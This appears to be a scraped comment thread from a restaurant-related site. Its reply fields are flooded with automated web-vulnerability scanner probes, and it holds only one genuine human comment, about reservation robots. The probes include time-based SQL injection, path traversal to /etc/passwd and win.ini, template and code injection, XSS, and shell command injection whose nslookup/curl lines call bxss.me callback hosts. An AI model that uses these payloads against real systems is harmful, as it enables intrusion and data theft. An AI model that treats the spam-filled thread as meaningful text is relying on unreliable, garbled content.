\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

1727141173

re: JJ

WEB-INF/web.xml

1727141174

re: JJ

WEB-INF\web.xml

1727141175

re: JJ

1

1727141601

re: JJ

1

1727141613

re: JJ

-1 OR 2+997-997-1=0+0+0+1 --

1727141613

re: JJ

-1 OR 3+997-997-1=0+0+0+1 --

1727141613

re: JJ

-1 OR 2+385-385-1=0+0+0+1

1727141614

re: JJ

-1 OR 3+385-385-1=0+0+0+1

1727141614

re: JJ

-1' OR 2+296-296-1=0+0+0+1 --

1727141614

re: JJ

-1' OR 3+296-296-1=0+0+0+1 --

1727141615

re: JJ

-1' OR 2+569-569-1=0+0+0+1 or 'IZ6AtQH6'='

1727141615

re: JJ

-1' OR 3+569-569-1=0+0+0+1 or 'IZ6AtQH6'='

1727141616

re: JJ

-1" OR 2+274-274-1=0+0+0+1 --

1727141616

re: JJ

-1" OR 3+274-274-1=0+0+0+1 --

1727141617

re: JJ

if(now()=sysdate(),sleep(15),0)

1727141653

re: JJ

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1727141686

re: JJ

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1727141696

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1727141710

re: JJ

-1; waitfor delay '0:0:15' --

1727141722

re: JJ

-1); waitfor delay '0:0:15' --

1727141733

re: JJ

1 waitfor delay '0:0:15' --

1727141745

re: JJ

BddABrpH'; waitfor delay '0:0:15' --

1727141756

re: JJ

-5 OR 936=(SELECT 936 FROM PG_SLEEP(15))--

1727141767

re: JJ

-5) OR 199=(SELECT 199 FROM PG_SLEEP(15))--

1727141776

re: JJ

-1)) OR 211=(SELECT 211 FROM PG_SLEEP(15))--

1727141784

re: JJ

PhOVAyvY' OR 775=(SELECT 775 FROM PG_SLEEP(15))--

1727141792

re: JJ

UVRQFlcd') OR 215=(SELECT 215 FROM PG_SLEEP(15))--

1727141801

re: JJ

MChBWX0o')) OR 818=(SELECT 818 FROM PG_SLEEP(15))--

1727141809

re: JJ

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1727141819

re: JJ

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1727141834

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1727141843

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1727141855

re: JJ

1'"

1727141856

re: JJ

@@nc0Zj

1727141857

re: JJ

1

1727383065

re: JJ

1

1727383065

re: JJ

1

1727383065

re: JJ

1

1727383590

re: JJ

1

1727383590

re: JJ

1

1727383591

re: JJ

1QKKPI9V90

1753894628

re: JJ

response.write(9414324*9935357)

1753894633

re: JJ

'+response.write(9414324*9935357)+'

1753894634

re: JJ

"+response.write(9414324*9935357)+"

1753894635

re: JJ


<esi:include src="http://bxss.me/rpb.png"/>

1753894635

re: JJ

../../../../../../../../../../../../../../etc/passwd

1753894638

re: JJ

../../../../../../../../../../../../../../windows/win.ini

1753894639

re: JJ

${9999497+9999293}

1753894639

re: JJ

file:///etc/passwd

1753894640

re: JJ

../

1753894642

re: JJ

redirtest.acx

1753894644

re: JJ

)

1753894646

re: JJ

!(()&&!|*|*|

1753894647

re: JJ

^(#$!@#$)(()))******

1753894648

re: JJ

ctime
sleep
p0
(I30
tp1
Rp2
.

1753894650

re: JJ

'.gethostbyname(lc('hitut'.'mqkqkbrf2c0b1.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(67).chr(117).chr(66).'

1753894651

re: JJ

".gethostbyname(lc("hitpd"."wqvbglqm04a44.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(76).chr(111).chr(88)."

1753894653

re: JJ

gethostbyname(lc('hitxh'.'doiglpurf3c98.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(115).chr(72).chr(101).chr(88)

1753894654

re: JJ

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

1753894655

1753894656

re: JJ

/etc/shells

1753894657

re: JJ

../../../../../../../../../../../../../../etc/shells

1753894658

re: JJ

bxss.me/t/xss.html?%00

1753894658

re: JJ

c:/windows/win.ini

1753894659

re: JJ

echo palxei$()\ cggcyr\nz^xyu||a #' &echo palxei$()\ cggcyr\nz^xyu||a #|" &echo palxei$()\ cggcyr\nz^xyu||a #

1753894659

re: JJ

bxss.me

1753894660

re: JJ

&echo gmmqyk$()\ sjtsxm\nz^xyu||a #' &echo gmmqyk$()\ sjtsxm\nz^xyu||a #|" &echo gmmqyk$()\ sjtsxm\nz^xyu||a #

1753894660

re: JJ

"+"A".concat(70-3).concat(22*4).concat(121).concat(89).concat(107).concat(79)+(require"socket"
Socket.gethostbyname("hithi"+"vkyuekjv8c641.bxss.me.")[3].to_s)+"

1753894660

re: JJ

replies

1753894660

1753894660

re: JJ

|echo tlvmqg$()\ qmytzy\nz^xyu||a #' |echo tlvmqg$()\ qmytzy\nz^xyu||a #|" |echo tlvmqg$()\ qmytzy\nz^xyu||a #

1753894661

re: JJ

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1753894661

re: JJ

'+'A'.concat(70-3).concat(22*4).concat(98).concat(81).concat(109).concat(89)+(require'socket'
Socket.gethostbyname('hitvq'+'ptzalpnr2afd9.bxss.me.')[3].to_s)+'

1753894661

re: JJ

replies

1753894661

1753894662

re: JJ

expr 9000656551 - 964989

1753894662

re: JJ

';print(md5(31337));$a='

1753894662

re: JJ

'A'.concat(70-3).concat(22*4).concat(111).concat(80).concat(110).concat(81)+(require'socket'
Socket.gethostbyname('hitvx'+'fcamlqnme88b0.bxss.me.')[3].to_s)

1753894662

re: JJ

replies/.

1753894662

re: JJ

'"

1753894662

re: JJ

(nslookup -q=cname hitsvznpqowruf1cb4.bxss.me||curl hitsvznpqowruf1cb4.bxss.me))

1753894663

re: JJ

";print(md5(31337));$a="

1753894663

re: JJ

$(nslookup -q=cname hitffvvzfqgru7de66.bxss.me||curl hitffvvzfqgru7de66.bxss.me)

1753894663

re: JJ

<!--

1753894664

re: JJ

${@print(md5(31337))}

1753894664

re: JJ

'"()

1753894664

re: JJ

&nslookup -q=cname hitccqvksethv32aae.bxss.me&'\"`0&nslookup -q=cname hitccqvksethv32aae.bxss.me&`'

1753894664

re: JJ

${@print(md5(31337))}\

1753894665

re: JJ


'&&sleep(27*1000)*bymsdm&&'

1753894665

re: JJ

&(nslookup -q=cname hitbphnbhdggq4ad3d.bxss.me||curl hitbphnbhdggq4ad3d.bxss.me)&'\"`0&(nslookup -q=cname hitbphnbhdggq4ad3d.bxss.me||curl hitbphnbhdggq4ad3d.bxss.me)&`'

1753894665

re: JJ

'.print(md5(31337)).'

1753894666

re: JJ


"&&sleep(27*1000)*hahhus&&"

1753894666

re: JJ

|(nslookup -q=cname hitndwssyuopg35eed.bxss.me||curl hitndwssyuopg35eed.bxss.me)

1753894666

re: JJ


'||sleep(27*1000)*qyoyhb||'

1753894667

re: JJ

`(nslookup -q=cname hitqzksrzowsq6a3ff.bxss.me||curl hitqzksrzowsq6a3ff.bxss.me)`

1753894667

re: JJ


"||sleep(27*1000)*bhcjhe||"

1753894668

re: JJ

;(nslookup -q=cname hitdievqzzhdye8388.bxss.me||curl hitdievqzzhdye8388.bxss.me)|(nslookup -q=cname hitdievqzzhdye8388.bxss.me||curl hitdievqzzhdye8388.bxss.me)&(nslookup -q=cname hitdievqzzhdye8388.bxss.me||curl hitdievqzzhdye8388.bxss.me)

1753894668

re: JJ

|(nslookup${IFS}-q${IFS}cname${IFS}hitxnlmopruwy01988.bxss.me||curl${IFS}hitxnlmopruwy01988.bxss.me)

1753894669

re: JJ


'"()&%<zzz><ScRiPt >Qa0T(9465)</ScRiPt>

1753894670

re: JJ

&(nslookup${IFS}-q${IFS}cname${IFS}hitvubtspjlxzbc15d.bxss.me||curl${IFS}hitvubtspjlxzbc15d.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitvubtspjlxzbc15d.bxss.me||curl${IFS}hitvubtspjlxzbc15d.bxss.me)&`'

1753894670

re: JJ

{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitaasnlcckii0a436.bxss.me")}}

1753894671

re: JJ

'"()&%<zzz><ScRiPt >Qa0T(9761)</ScRiPt>

1753894671

re: JJ


9293842

1753894672

re: JJ


OSpsBgsW

1753894862

re: JJ


*1

1753894868

re: JJ


*1

1753894869

re: JJ


*1

1753894869

re: JJ


*1

1753894870

re: JJ

-1 OR 5*5=25 --

1753894870

re: JJ

-1 OR 5*5=26 --

1753894871

re: JJ

-1 OR 5*5=25

1753894872

re: JJ

-1 OR 5*5=26

1753894872

re: JJ


*if(now()=sysdate(),sleep(15),0)

1753894878

re: JJ


0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z

1753894885

re: JJ


0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z

1753894892

re: JJ

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1753894897

re: JJ


-1; waitfor delay '0:0:15' --

1753894903

re: JJ


-1); waitfor delay '0:0:15' --

1753894909

re: JJ


-1 waitfor delay '0:0:15' --

1753894915

re: JJ


lKmsLRir'; waitfor delay '0:0:15' --

1753894919

re: JJ


-1 OR 175=(SELECT 175 FROM PG_SLEEP(15))--

1753894924

re: JJ


-1) OR 905=(SELECT 905 FROM PG_SLEEP(15))--

1753894931

re: JJ


-1)) OR 173=(SELECT 173 FROM PG_SLEEP(15))--

1753894936

re: JJ


pADPWuyZ' OR 894=(SELECT 894 FROM PG_SLEEP(15))--

1753894941

re: JJ


yVbTzvWv') OR 529=(SELECT 529 FROM PG_SLEEP(15))--

1753894949

re: JJ


Yo2G8I9I')) OR 295=(SELECT 295 FROM PG_SLEEP(15))--

1753894955

re: JJ


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1753894961

re: JJ


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1753894967

re: JJ

'||(select 1 from (select pg_sleep(15))x)||'

1753894972

re: JJ

''||(select 1 from (select pg_sleep(15))x)||''

1753894978

re: JJ


'"

1753894980

re: JJ

@@iIVPE

1753894981

re: JJ

(select 198766*667891)

1753894982

re: JJ

(select 198766*667891 from DUAL)

1753894983

It's a little odd to me to imagine a restaurant would on one hand not use online booking, but on the other be ok with robots calling (/harassing) them to make reservations. That being said Pecotter and the likes often come on top of google search, so maybe they work,,, or maybe they have really good SEO.

1681050449 Reply
Add photos

re: kk1337

3dPXIlKr

1697002608

re: kk1337

1*

1697002609

re: kk1337

1*

1697002609

re: kk1337

1*

1697002609

re: kk1337

1*

1697002609

re: kk1337

-1 OR 2+923-923-1=0+0+0+1

1697002610

re: kk1337

-1 OR 3+923-923-1=0+0+0+1

1697002610

re: kk1337

grqrBmak

1697002614

re: kk1337

1*

1697002615

re: kk1337

1*

1697002615

re: kk1337

1*

1697002615

re: kk1337

1*

1697002615

re: kk1337

-1 OR 2+808-808-1=0+0+0+1

1697002616

re: kk1337

-1 OR 3+808-808-1=0+0+0+1

1697002616

re: kk1337

if(now()=sysdate(),sleep(15),0)

1697002616

re: kk1337

if(now()=sysdate(),sleep(15),0)

1697002620

re: kk1337

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002620

re: kk1337

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

1697002623

re: kk1337

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002624

re: kk1337

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

1697002627

re: kk1337

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002627

re: kk1337

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

1697002632

re: kk1337

-1; waitfor delay '0:0:15' --

1697002632

re: kk1337

-1; waitfor delay '0:0:15' --

1697002637

re: kk1337

-1); waitfor delay '0:0:15' --

1697002637

re: kk1337

-1); waitfor delay '0:0:15' --

1697002642

re: kk1337

1 waitfor delay '0:0:15' --

1697002642

re: kk1337

1 waitfor delay '0:0:15' --

1697002646

re: kk1337

UBnryigN'; waitfor delay '0:0:15' --

1697002646

re: kk1337

aKBETc9q'; waitfor delay '0:0:15' --

1697002650

re: kk1337

-5 OR 171=(SELECT 171 FROM PG_SLEEP(15))--

1697002651

re: kk1337

-5 OR 43=(SELECT 43 FROM PG_SLEEP(15))--

1697002655

re: kk1337

-5) OR 745=(SELECT 745 FROM PG_SLEEP(15))--

1697002658

re: kk1337

-5) OR 388=(SELECT 388 FROM PG_SLEEP(15))--

1697002663

re: kk1337

-1)) OR 954=(SELECT 954 FROM PG_SLEEP(15))--

1697002663

re: kk1337

-1)) OR 253=(SELECT 253 FROM PG_SLEEP(15))--

1697002667

re: kk1337

xoDC3nnK' OR 929=(SELECT 929 FROM PG_SLEEP(15))--

1697002667

re: kk1337

c5yzRdfN' OR 269=(SELECT 269 FROM PG_SLEEP(15))--

1697002670

re: kk1337

eWwQDsSG') OR 450=(SELECT 450 FROM PG_SLEEP(15))--

1697002671

re: kk1337

T3E2AtOe') OR 895=(SELECT 895 FROM PG_SLEEP(15))--

1697002674

re: kk1337

vo03ngz2')) OR 260=(SELECT 260 FROM PG_SLEEP(15))--

1697002674

re: kk1337

s6ydlbeL')) OR 865=(SELECT 865 FROM PG_SLEEP(15))--

1697002679

re: kk1337


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002680

re: kk1337


*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1697002682

re: kk1337


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002683

re: kk1337


'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

1697002686

re: kk1337

'||(select 1 from (select pg_sleep(15))x)||'

1697002687

re: kk1337

'||(select 1 from (select pg_sleep(15))x)||'

1697002690

re: kk1337

''||(select 1 from (select pg_sleep(15))x)||''

1697002691

re: kk1337

1'"

1697002692

re: kk1337

@@lWQNd

1697002692

re: kk1337

''||(select 1 from (select pg_sleep(15))x)||''

1697002694

re: kk1337

1'"

1697002694

re: kk1337

@@4ePME

1697002695

re: kk1337

1E09G0e4O

1727141117

re: kk1337

%0abcc:074625.67-13745.67.59ad6.19990.2@bxss.me

1727141119

re: kk1337

to@example.com>%0d%0abcc:074625.67-13746.67.59ad6.19990.2@bxss.me

1727141120

re: kk1337

response.write(9364609*9727312)

1727141120

re: kk1337

'+response.write(9364609*9727312)+'

1727141121

re: kk1337

<esi:include src="http://bxss.me/rpb.png"/>

1727141122

re: kk1337

"+response.write(9364609*9727312)+"

1727141122

re: kk1337

${9999090+9999333}

1727141122

re: kk1337

../../../../../../../../../../../../../../etc/passwd

1727141123

re: kk1337

../../../../../../../../../../../../../../windows/win.ini

1727141124

re: kk1337

file:///etc/passwd

1727141125

re: kk1337

../../../../../../../../../../../../../../../proc/version

1727141126

re: kk1337

'.gethostbyname(lc('hitza'.'ckfqntwpbec85.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(113).chr(65).chr(99).chr(77).'

1727141126

re: kk1337

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

1727141127

re: kk1337

".gethostbyname(lc("hitzd"."ynnnbebj0ae59.bxss.me."))."A".chr(67).chr(hex("58")).chr(98).chr(72).chr(107).chr(88)."

1727141127

re: kk1337

../../../../../../../../../../etc/passwd%00.jpg

1727141128

re: kk1337

)

1727141128

re: kk1337

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1727141129

re: kk1337

!(()&&!|*|*|

1727141129

re: kk1337

/../..//../..//../..//../..//../..//etc/passwd%00.jpg

1727141130

re: kk1337

^(#$!@#$)(()))******

1727141130

re: kk1337

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1727141130

re: kk1337

/etc/passwd

1727141131

re: kk1337

echo vjcvqg$()\ sfqmkr\nz^xyu||a #' &echo vjcvqg$()\ sfqmkr\nz^xyu||a #|" &echo vjcvqg$()\ sfqmkr\nz^xyu||a #

1727141132

re: kk1337

%2fetc%2fpasswd

1727141132

re: kk1337

&echo pvrndt$()\ kfvtmw\nz^xyu||a #' &echo pvrndt$()\ kfvtmw\nz^xyu||a #|" &echo pvrndt$()\ kfvtmw\nz^xyu||a #

1727141133

re: kk1337

/.././.././.././.././.././.././.././../etc/./passwd%00

1727141133

1727141133

re: kk1337

|echo xgvylj$()\ orjerk\nz^xyu||a #' |echo xgvylj$()\ orjerk\nz^xyu||a #|" |echo xgvylj$()\ orjerk\nz^xyu||a #

1727141134

re: kk1337

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1727141134

re: kk1337

bxss.me/t/xss.html?%00

1727141134

re: kk1337

"+"A".concat(70-3).concat(22*4).concat(103).concat(80).concat(106).concat(88)+(require"socket"
Socket.gethostbyname("hitnr"+"pwnaddor328b7.bxss.me.")[3].to_s)+"

1727141134

re: kk1337

(nslookup hiteifntwulpqc727d.bxss.me||perl -e "gethostbyname('hiteifntwulpqc727d.bxss.me')")

1727141135

re: kk1337

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1727141135

re: kk1337

'+'A'.concat(70-3).concat(22*4).concat(121).concat(86).concat(102).concat(75)+(require'socket'
Socket.gethostbyname('hitrk'+'taqmlnswff046.bxss.me.')[3].to_s)+'

1727141135

re: kk1337

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

1727141135

re: kk1337

$(nslookup hitwxzuyvcgubbce0c.bxss.me||perl -e "gethostbyname('hitwxzuyvcgubbce0c.bxss.me')")

1727141135

re: kk1337

../././../././../././../././../././../././../././../././../././../././etc/passwd

1727141136

re: kk1337

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1727141136

1727141136

re: kk1337

&nslookup hitemaxdluiyi22fd1.bxss.me&'\"`0&nslookup hitemaxdluiyi22fd1.bxss.me&`'

1727141136

re: kk1337

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1727141136

re: kk1337

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

1727141137

1727141137

re: kk1337

&(nslookup hitjnjdabjsvy61d58.bxss.me||perl -e "gethostbyname('hitjnjdabjsvy61d58.bxss.me')")&'\"`0&(nslookup hitjnjdabjsvy61d58.bxss.me||perl -e "gethostbyname('hitjnjdabjsvy61d58.bxss.me')")&`'

1727141137

re: kk1337

';print(md5(31337));$a='

1727141137

re: kk1337

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

1727141137

re: kk1337

/etc/shells

1727141138

re: kk1337

|(nslookup hitvfswumhivef3f1a.bxss.me||perl -e "gethostbyname('hitvfswumhivef3f1a.bxss.me')")

1727141138

re: kk1337

";print(md5(31337));$a="

1727141138

re: kk1337

'"

1727141138

re: kk1337

file:///etc/passwd

1727141138

re: kk1337

c:/windows/win.ini

1727141138

re: kk1337

`(nslookup hithzvqdumdjib8ca0.bxss.me||perl -e "gethostbyname('hithzvqdumdjib8ca0.bxss.me')")`

1727141139

re: kk1337

${@print(md5(31337))}

1727141139

re: kk1337

<!--

1727141139

re: kk1337

/\../\../\../\../\../\../\../etc/passwd

1727141139

re: kk1337

bxss.me

1727141139

re: kk1337

;(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")|(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")&(nslookup hitmovklfhkdaef1c8.bxss.me||perl -e "gethostbyname('hitmovklfhkdaef1c8.bxss.me')")

1727141139

re: kk1337

${@print(md5(31337))}\

1727141139

re: kk1337

/WEB-INF/web.xml

1727141140

re: kk1337

'.print(md5(31337)).'

1727141140

re: kk1337

C:\WINDOWS\system32\drivers\etc\hosts

1727141141

re: kk1337

../../../../../../../../../../windows/win.ini%00.jpg

1727141141

re: kk1337

/../../../../../../../../../../boot.ini

1727141142

re: kk1337

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

1727141143

re: kk1337

..\..\..\..\..\..\..\..\windows\win.ini

1727141143

re: kk1337

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

1727141144

re: kk1337

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1727141145

re: kk1337

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1727141145

re: kk1337

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1727141147

re: kk1337

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.